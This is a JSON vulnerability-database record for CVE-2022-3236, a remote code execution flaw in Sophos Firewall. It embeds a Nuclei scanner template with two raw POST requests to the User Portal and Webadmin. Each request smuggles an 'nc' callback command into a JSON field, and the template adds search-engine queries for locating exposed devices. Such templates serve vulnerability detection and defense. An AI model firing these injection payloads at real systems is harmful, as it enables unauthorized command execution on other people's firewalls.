{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-3236/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-3236/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-3236/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-3236/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-3236/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-3236"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-3236"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2022/CVE-2022-3236.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2022-3236\n\ninfo:\n  name: Sophos Firewall <= 19.0 MR1 - Remote Code Execution\n  author: daffainfo\n  severity: critical\n  description: |\n    Sophos Firewall version v19.0 MR1 and older is vulnerable to code injection in the User Portal and Webadmin, allowing a remote unauthenticated attacker to execute arbitrary code.\n  impact: |\n    Remote attackers can execute arbitrary code on the system, potentially leading to full system compromise.\n  remediation: |\n    Update to the latest version of Sophos Firewall.\n  reference:\n    - https://www.thezdi.com/blog/2022/10/19/cve-2022-3236-sophos-firewall-user-portal-and-web-admin-code-injection\n    - https://nvd.nist.gov/vuln/detail/cve-2022-3236\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-3236\n    cwe-id: CWE-94\n    epss-score: 0.98905\n    epss-percentile: 0.99926\n    cpe: cpe:2.3:a:sophos:firewall:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: sophos\n    product: firewall\n    shodan-query: http.title:\"Sophos\"\n    fofa-query: title=\"sophos\"\n  tags: cve,cve2022,sophos,firewall,rce,intrusive,oast,kev,vkev\n\nflow: http(1) || http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /userportal/Controller HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        X-Requested-With: XMLHttpRequest\n\n        mode=451&json=%7b%22username%22%3a%22admin%22%2c%22password%22%3a%22x%22%2c%22languageid%22%3a%221%22%2c%22browser%22%3a%22Firefox_91%22%2c%22_discriminator%22%3a%7b%22curvalue%22%3a%22%3b%60nc%20{{interactsh-url}}%2080%60%22%7d%2c%22value%22%3a%22curvalue%22%7d&__RequestType=ajax&t=1710331582506\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"dns\")'\n          - 'contains(content_type, \"text/plain\")'\n          - 'contains(header, \"Server: xxxx\")'\n          - 'status_code == 200'\n          - 'contains(body, \"redirectionURL\")'\n        condition: and\n\n  - raw:\n      - |\n        POST /webconsole/Controller HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        X-Requested-With: XMLHttpRequest\n\n        mode=151&json=%7b%22username%22%3a%22admin%22%2c%22password%22%3a%22x%22%2c%22languageid%22%3a%221%22%2c%22browser%22%3a%22Firefox_91%22%2c%22_discriminator%22%3a%7b%22curvalue%22%3a%22%3b%60nc%20{{interactsh-url}}%2080%60%22%7d%2c%22value%22%3a%22curvalue%22%7d&__RequestType=ajax&t=1710331582506\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"dns\")'\n          - 'contains(content_type, \"text/plain\")'\n          - 'contains(header, \"Server: xxxx\")'\n          - 'status_code == 200'\n          - 'contains(body, \"redirectionURL\")'\n        condition: and\n# digest: 490a00463044022001b87bc0a02395d63b9589fe7b23c329c5f60119dbf2160b7f6007c12803c9d3022004826f11ea781c629c666f9c52aa0324e8dba19b804390a2e5a018e44af7a8a1:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2022-3236"
}